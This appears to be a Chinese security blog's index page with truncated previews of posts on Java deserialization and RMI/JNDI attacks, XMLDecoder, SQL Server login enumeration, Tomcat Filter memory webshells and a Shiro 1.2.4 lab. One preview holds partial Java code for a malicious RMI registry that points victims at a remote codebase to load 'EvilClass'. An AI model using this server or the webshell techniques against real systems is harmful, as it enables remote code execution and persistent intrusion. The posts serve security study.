前言这篇文章内容主要是记录当时获取到漏洞情报后分析的思路,所以对该组件和相关的知识点没有补充(后面更新) 分析通过搜索漏洞触发关键(字\函数)

前言通过跟踪xmlDecoder发现核心是用SAX来解析xml的，所以会在开始分析xmlDecoder前补充一下sax解析xml的基础知识 S

RMI-攻击客户端 分析恶意服务端 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 import com.sun.jndi.rmi.registry.ReferenceWrapper; import javax.naming.Reference; import java.rmi.registry.LocateRegistry; import java.rmi.registry.Registry; public class Main_Evil { public static void main(String[] args) { try { Registry registry = LocateRegistry.createRegistry(1099); Reference aa = new Reference("EvilClass", "EvilClass", "http://192.168.1.3:9901/"); ReferenceWrapper refObjWrapper =

基础信息处理 主机用户信息exec xp_logininfo 获取数据库可登录用户信息select is_disabled, loginproperty(name,'Isexpired') is_expired, loginproperty(name,'Islocked') is_locked, * from sys.server_principals 获取当前用户可访问的数据库SELECT * FROM sys.databases WHERE HAS_DBACCESS(name) = 1 获

Tomcat Filter内存马实现 了解Tomcat基础部分 Tomcat的主要功能tomcat作为一个 Web 服务器，实现了两个非常核心的功能： Http 服务器功能：

环境搭建https://github.com/apache/shiro/archive/refs/tags/shiro-root-1.2.4